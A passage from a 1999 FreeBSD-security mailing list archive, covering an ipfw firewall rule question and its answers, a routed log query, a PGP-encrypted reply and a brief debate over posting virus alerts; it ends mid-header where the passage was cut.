From owner-freebsd-security Sun Mar 28 4:27:29 1999 Delivered-To: freebsd-security@freebsd.org Received: from alpha.netvision.net.il (alpha.netvision.net.il [194.90.1.13]) by hub.freebsd.org (Postfix) with ESMTP id 4B55914FCA; Sun, 28 Mar 1999 04:26:18 -0800 (PST) (envelope-from noor@NetVision.net.il) Received: from nvt (nvt.netvision.net.il [194.90.6.14]) by alpha.netvision.net.il (8.9.3/8.8.6) with ESMTP id OAA03292; Sun, 28 Mar 1999 14:25:47 +0200 (IST) Date: Sun, 28 Mar 1999 14:23:57 +0200 (IST) From: Noor Dawod To: freebsd-hackers@freebsd.org Subject: ipfw behavior, is it normal? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi.. Like many others have done before me, this is my first message to this mailing list and I hope not the last. I've been dealing with FreeBSD for quite some time now, and I cannot still understand why few ipfw rules don't work for me. I would like to share it with you and maybe get some help on it. My current ipfw rules are: ----------------------------------------------------------------- 00100 allow ip from any to any via lo0 00200 allow ip from [machine-a-ip] to [server-ip] via xl0 00300 allow ip from [machine-b-ip] to [server-ip] via xl0 00400 allow ip from any to [server-ip] 80 in via xl0 00500 allow ip from any to [server-ip] 21 in via xl0 65000 allow ip from any to any 65535 deny ip from any to any ----------------------------------------------------------------- 00200 and 00300 seem redundant because of rule 65000. But this is where all the problem lies. If I understand right the ipfw rules, if I remove line 65000 from the rules table, then I can still do all ip-related actions from [machine-a] and [machine-b], which their ip numbers are listed in 00200 and 00300. But, once I remove line 65000, I cannot do any ip-related actions on the [server], and even WWW/FTP services are not served as well. What am I missing here, and why the 65000 line MUST be there so that I could access [server] from [machine-a] and [machine-b] ? I apologize if this is not the place to ask such questions, and would like to be told where to send it instead. Thanks for your time and efforts. Noor To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Mar 28 12:14: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from quaggy.ursine.com (lambda.blueneptune.com [209.133.45.179]) by hub.freebsd.org (Postfix) with ESMTP id E1B6614C48 for ; Sun, 28 Mar 1999 12:13:51 -0800 (PST) (envelope-from fbsd-security@ursine.com) Received: from michael (lambda.ursine.com [209.133.45.69]) by quaggy.ursine.com (8.9.2/8.9.2) with ESMTP id MAA32091; Sun, 28 Mar 1999 12:13:19 -0800 (PST) (envelope-from fbsd-security@ursine.com) Message-ID: <199903281213260190.4BEF77D0@quaggy.ursine.com> In-Reply-To: References: X-Mailer: Calypso Evaluation Version 3.00.00.13 (2) Date: Sun, 28 Mar 1999 12:13:26 -0800 From: "Michael Bryan" To: "Noor Dawod" Cc: freebsd-security@freebsd.org Subject: Re: ipfw behavior, is it normal? Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 3/28/99 at 2:23 PM Noor Dawod wrote: > > My current ipfw rules are: > >----------------------------------------------------------------- >00100 allow ip from any to any via lo0 >00200 allow ip from [machine-a-ip] to [server-ip] via xl0 >00300 allow ip from [machine-b-ip] to [server-ip] via xl0 >00400 allow ip from any to [server-ip] 80 in via xl0 >00500 allow ip from any to [server-ip] 21 in via xl0 >65000 allow ip from any to any >65535 deny ip from any to any >----------------------------------------------------------------- If you remove rule 65000, then you have no rules to allow any traffic -out- of your system. If you wanted to fully open up traffic to machine-a and machine-b, then you could have these rules: 00250 allow ip from [server-ip] to [machine-a-ip] via xl0 00350 allow ip from [server-ip] to [machine-b-ip] via xl0 Similarly, you need counterparts to rules 400 and 500 for the outbound side. (You should also be specifying "tcp" in those rules, not "ip".) The http port is easy enough: 00450 allow tcp from [server-ip] 80 to any out via xl0 (Assuming you're using a single IP address and a single port with your HTTP server, of course.) FTP access is a little trickier, thanks to the data port used by FTP, and the issues of active vs passive FTP. I'd recommend looking at a good firewall security book, such as the O'Reily book. (www.ora.com) There are a number of ways to open up FTP access, each with their own set of pros and cons. Michael Bryan fbsd-security@ursine.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Mar 28 12:21:44 1999 Delivered-To: freebsd-security@freebsd.org Received: from quaggy.ursine.com (lambda.blueneptune.com [209.133.45.179]) by hub.freebsd.org (Postfix) with ESMTP id D343515637 for ; Sun, 28 Mar 1999 12:21:42 -0800 (PST) (envelope-from fbsd-security@ursine.com) Received: from michael (lambda.ursine.com [209.133.45.69]) by quaggy.ursine.com (8.9.2/8.9.2) with ESMTP id MAA32136; Sun, 28 Mar 1999 12:20:56 -0800 (PST) (envelope-from fbsd-security@ursine.com) Message-ID: <199903281221020900.4BF6702B@quaggy.ursine.com> In-Reply-To: <199903281213260190.4BEF77D0@quaggy.ursine.com> References: <199903281213260190.4BEF77D0@quaggy.ursine.com> X-Mailer: Calypso Evaluation Version 3.00.00.13 (2) Date: Sun, 28 Mar 1999 12:21:02 -0800 From: "Michael Bryan" To: "Noor Dawod" Cc: freebsd-security@FreeBSD.ORG Subject: Re: ipfw behavior, is it normal? Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >I'd recommend looking at a good firewall security book, >such as the O'Reily book. (www.ora.com) BTW, here's the URL leading directly to O'Reilly's page about this book: http://www.oreilly.com/catalog/fire/ Michael Bryan fbsd-security@ursine.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Mar 28 12:28:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp.thegrid.net (smtp.thegrid.net [209.162.1.11]) by hub.freebsd.org (Postfix) with SMTP id 3236614CF7 for ; Sun, 28 Mar 1999 12:28:26 -0800 (PST) (envelope-from dean@thegrid.net) Received: (qmail 23031 invoked from network); 28 Mar 1999 20:28:06 -0000 Received: from pop.thegrid.net (209.162.1.5) by smtp.thegrid.net with SMTP; 28 Mar 1999 20:28:06 -0000 Received: from zippy (lax-ts5-h2-47-226.ispmodems.net [209.162.47.226]) by pop.thegrid.net (8.9.1a/8.9.1) with SMTP id MAA12725; Sun, 28 Mar 1999 12:28:05 -0800 (PST) Message-Id: <4.1.19990328120848.009ab150@mail.thegrid.net> X-Sender: i289861@mail.thegrid.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Sun, 28 Mar 1999 12:23:46 -0800 To: Noor Dawod , freebsd-security@freebsd.org From: Dean Subject: Re: ipfw behavior, is it normal? In-Reply-To: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 02:23 PM 3/28/99 +0200, you wrote: > My current ipfw rules are: > >----------------------------------------------------------------- >00100 allow ip from any to any via lo0 >00200 allow ip from [machine-a-ip] to [server-ip] via xl0 >00300 allow ip from [machine-b-ip] to [server-ip] via xl0 >00400 allow ip from any to [server-ip] 80 in via xl0 >00500 allow ip from any to [server-ip] 21 in via xl0 >65000 allow ip from any to any >65535 deny ip from any to any >----------------------------------------------------------------- > > 00200 and 00300 seem redundant because of rule 65000. But this is where >all the problem lies. If I understand right the ipfw rules, if I remove >line 65000 from the rules table, then I can still do all ip-related >actions from [machine-a] and [machine-b], which their ip numbers are >listed in 00200 and 00300. But, once I remove line 65000, I cannot do any >ip-related actions on the [server], and even WWW/FTP services are not >served as well. > > What am I missing here, and why the 65000 line MUST be there so that I >could access [server] from [machine-a] and [machine-b] ? Rule 65000 makes all the other rules before it redundant. This ruleset (if you remove line 65000) will only allow connections from machine a and b to the server. Plus http and ftp connections from anywhere to the server. Is xl0 you 'inside' interface or 'outside' interface? Make sure you've got the right ip addresses for machine a and b. Is the firewall running on the server or some other machine? Dean ------------------------------------------------------------------------------- A train stops at a tarin station, a bus stops at a bus staion. On my desk, I have a workstation.... ------------------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 9:56:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from xwin.nmhtech.com (xwin.nmhtech.com [208.138.46.10]) by hub.freebsd.org (Postfix) with ESMTP id 0875815947 for ; Mon, 29 Mar 1999 09:56:53 -0800 (PST) (envelope-from nicole@xwin.nmhtech.com) Received: by xwin.nmhtech.com (Postfix, from userid 1001) id E03822EE1A; Mon, 29 Mar 1999 09:56:34 -0800 (PST) Content-Length: 1514 Message-ID: X-Mailer: XFMail 1.2 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: quoted-printable MIME-Version: 1.0 Date: Mon, 29 Mar 1999 09:56:34 -0800 (PST) From: Nicole Harrington To: freebsd-security@freebsd.org Subject: Someone trying to route to my machine? Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Below are some messages I don't understand. Is someone trying to route to = my machine to do something? The forwarding is becouse I have the logs being s= ent to my workstation machine as well as stored locally. I receievd abt 50 of t= hem. whoever they are they were persistant! Any assistance would be apprecciated. Thanks Nicole Mar 29 03:47:43 ton Forwarded from XXXXXXX: Forwarded from XXXXXXXX: routed[72]: static route 203.150.128.4/32 --> 0.0.0.0 impossibly lacks ifp Mar 29 03:47:43 ton Forwarded from XXXXX: Forwarded from XXXXX: routed[72]: static route 203.150.128.4/32 --> 0.0.0.0 impossibly lacks ifp |\ __ /| (`\ =20 | o_o |__ ) ) =20 // \\ =20 nicole@nmhtech.com | http://www.webweaver.net/ webmistress@dangermouse.org | http://www.dangermouse.org -------------------------(((---(((----------------------- =20 - Powered by Coka Cola and FreeBSD - - Stong enough for a man - But made for a Woman - =20 - I'm not ADD - I'm just Multithreaded - - Microsoft: What bug would you like today? - ---------------------------------------------------------- SYSADMIN(1) Sysadmin is the keeper of all things computer, is generally harangued, must= be=20 supplied with caffeine, chocolate, and sushi in order to function=20 properly,=20 cannot be exposed to direct sunlight, and must not be allowed to have a lif= e. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 12:32:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from belem.libnet.com.br (belem.libnet.com.br [200.242.252.66]) by hub.freebsd.org (Postfix) with ESMTP id E04A514CD1 for ; Mon, 29 Mar 1999 12:31:44 -0800 (PST) (envelope-from misty@biosys.net) Received: from master (m24.libnet.com.br [200.242.252.150]) by belem.libnet.com.br (8.9.3/8.9.3) with SMTP id RAA13811; Mon, 29 Mar 1999 17:36:12 -0300 Message-Id: <3.0.3.32.19990329173110.0070e480@pop.libnet.zaz.com.br> X-Sender: brm.bel@pop.libnet.zaz.com.br X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.3 (32) Date: Mon, 29 Mar 1999 17:31:10 -0300 To: Bob Vaughan , agora@agoractvm.com.br, bishop@sekure.org From: Misty Subject: Re: NOVO VIRUS. Cc: admin@suntelnetwork.net, alessandrofm@nitnet.com.br, bk@linuxbr.com.br, bmfrio@parxtech.com.br, bos@sekure.org, brodbeck@tro.matrix.com.br, colpani@furb.rct-sc.br, cox@sinistro.net, darklady@zipmail.com.br, eleet@sekure.org, freebsd-security@FreeBSD.ORG, grlink@infolink.com.br, hc_@linuxbr.com.br, isc@suntelnetwork.net, jamez@sekure.org, luciana@mtec.com.br, nelsonbrito@netscape.net, niusin@montreal.com.br, paranoia@sekure.org, pjr@ruralrj.com.br, SECRETARIA@bvrj.com.br, silveira@esquadro.com.br, suid-bit@usa.net In-Reply-To: <199903242310.PAA06293@tantivy.stanford.edu> References: Mime-Version: 1.0 Content-Type: multipart/encrypted; boundary="=--"; protocol="application/pgp-encrypted" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --=-- Content-Type: application/pgp-encrypted Version: 1 --=-- Content-Type: application/octet-stream -----BEGIN PGP MESSAGE----- Version: PGPfreeware 5.5.3i for non-commercial use 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 fdZS =VYtw -----END PGP MESSAGE----- --=---- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 12:49:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.rapidsite.net (mail.rapidsite.net [207.158.192.62]) by hub.freebsd.org (Postfix) with SMTP id A105A14E66 for ; Mon, 29 Mar 1999 12:49:36 -0800 (PST) (envelope-from gryphon@intech.net) Received: from gw1.hway.net (207.158.192.37) by mail.rapidsite.net (RS ver 1.0.2) with SMTP id 21182 for ; Mon, 29 Mar 1999 15:49:11 -0500 (EST) Message-ID: <36FFE82E.9FF42BF9@intech.net> Date: Mon, 29 Mar 1999 15:53:02 -0500 From: Coranth Gryphon Reply-To: gryphon@hway.net X-Mailer: Mozilla 4.08 [en] (WinNT; I) MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: virus announcements? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Loop-Detect: 1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I know that this is a general security list, but is is appropriate to post virus announcements here for beasties which cannot affect FreeBSD (or any unix) directly? -coranth PS> And maybe it's just me, but sending a virus alert about attachments and putting the data in an attachment, seems to defeat the purpose... ---------------------------------------+---------------------------- Coranth Gryphon | Work Phone: 561-912-2497 Chief Architect, Hiway Technologies | #include ---------------------------------------+---------------------------- When all else fails, do the impossible. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 12:53:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 856BD14D56 for ; Mon, 29 Mar 1999 12:53:39 -0800 (PST) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id MAA34668; Mon, 29 Mar 1999 12:53:12 -0800 (PST) (envelope-from dillon) Date: Mon, 29 Mar 1999 12:53:12 -0800 (PST) From: Matthew Dillon Message-Id: <199903292053.MAA34668@apollo.backplane.com> To: Coranth Gryphon Cc: freebsd-security@FreeBSD.ORG Subject: Re: virus announcements? References: <36FFE82E.9FF42BF9@intech.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :I know that this is a general security list, but is is appropriate :to post virus announcements here for beasties which cannot affect :FreeBSD (or any unix) directly? No. I don't think anyone here is really interested in hearing about semi-intelligent programmers writing viruses that exploit big gaping holes in OSs that have been known to have said big gaping holes for untold years. Some idiot in the press called these things viruses. They aren't viruses, they're clue sticks. WHAP! -Matt Matthew Dillon :-coranth : :PS> And maybe it's just me, but sending a virus alert about attachments :and putting the data in an attachment, seems to defeat the purpose... : :---------------------------------------+---------------------------- : Coranth Gryphon | Work Phone: 561-912-2497 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 13:10:34 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.tepucom.nl (mail.tepucom.nl [195.81.12.5]) by hub.freebsd.org (Postfix) with ESMTP id AECF3154E2 for ; Mon, 29 Mar 1999 13:10:30 -0800 (PST) (envelope-from theo@tepucom.nl) Received: from kantoor-1.tepucom.nl (localhost [127.0.0.1]) by mail.tepucom.nl (8.8.5/SCO5) with SMTP id XAA03700 for ; Mon, 29 Mar 1999 